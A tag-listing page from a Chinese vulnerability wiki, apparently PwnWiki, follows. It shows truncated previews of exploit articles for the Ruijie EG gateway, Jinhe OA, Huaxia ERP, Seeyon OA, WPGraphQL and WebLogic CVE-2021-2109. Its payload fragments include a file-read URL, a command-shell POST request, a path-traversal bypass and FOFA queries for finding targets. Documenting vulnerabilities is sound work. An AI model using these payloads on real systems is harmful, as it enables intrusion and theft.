锐捷EG易网关 download.php 后台任意文件读取漏洞
免费、自由、人人可编辑的漏洞库 , Contents 1 FOFA 2 Payload 3 POC 4 参考 FOFA app="Ruijie-EG易网关" Payload /download.php?a=read_txt&file ...
标签:format
以下是与标签“format”相关联的文章
-
-
锐捷EG易网关 cli.php 远程命令执行漏洞
免费、自由、人人可编辑的漏洞库 , 漏洞利用 发送以下请求: POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Co ...
-
金和OA C6 后台越权敏感文件遍历漏洞 0day/zh-hant
免费、自由、人人可编辑的漏洞库--pwnwiki.com , Contents 1 漏洞影响 2 POC 2.1 ⚠️️ 3 参考 漏洞影响 金和OA C6 POC ⚠️️ POC只检测是否存在漏洞,且漏洞存在于后台需要登录 运行后访问链接 ...
-
金和OA C6 后台越权敏感文件遍历漏洞 0day/zh-cn
PWNWIK.COM , Contents 1 漏洞影响 2 POC 2.1 ⚠️️ 3 参考 漏洞影响 金和OA C6 POC ⚠️️ POC只检测是否存在漏洞,且漏洞存在于后台需要登录运行后访问链接即可下载文件 import reque ...
-
金和OA C6 后台越权敏感文件遍历漏洞 0day
pwnwiki.com , Contents 1 漏洞影响 2 POC 2.1 ⚠️️ 3 参考 漏洞影响 金和OA C6 POC ⚠️️ POC只检测是否存在漏洞,且漏洞存在于后台需要登录 运行后访问链接即可下载文件 import req ...
-
华夏ERP授权绕过漏洞
免费、自由、人人可编辑的漏洞库 , POC python3 poc.py http://ip:port import sys,requests def main(ip): url = "{ip}/a.css/../user/getUserL ...
-
致远OA A6 test.jsp SQL注入漏洞/zh-hant
免费、自由、人人可编辑的漏洞库--PwnWiki.com , Contents 1 FOFA 2 Payload 3 高级利用 4 参考 FOFA title="致远A8+协同管理软件.A6" Payload http://xxx.xxx. ...
-
致远OA A6 test.jsp SQL注入漏洞
pwnwiki.com , Contents 1 FOFA 2 Payload 3 高级利用 4 参考 FOFA title="致远A8+协同管理软件.A6" Payload http://xxx.xxx.xxx.xxx/yyoa/comm ...
-
WordPress Plugin WPGraphQL 1.3.5 拒绝服务漏洞
免费、自由、人人可编辑的漏洞库 , EXP # Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service # Author: Dolev Farhi # Date ...
-
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
免费、自由、人人可编辑的漏洞库--PwnWiki.com , Contents 1 漏洞影响 2 漏洞环境 3 漏洞检测 4 漏洞利用 5 POC 6 参考 漏洞影响 WebLogic Server 10.3.6.0.0 WebLogic ...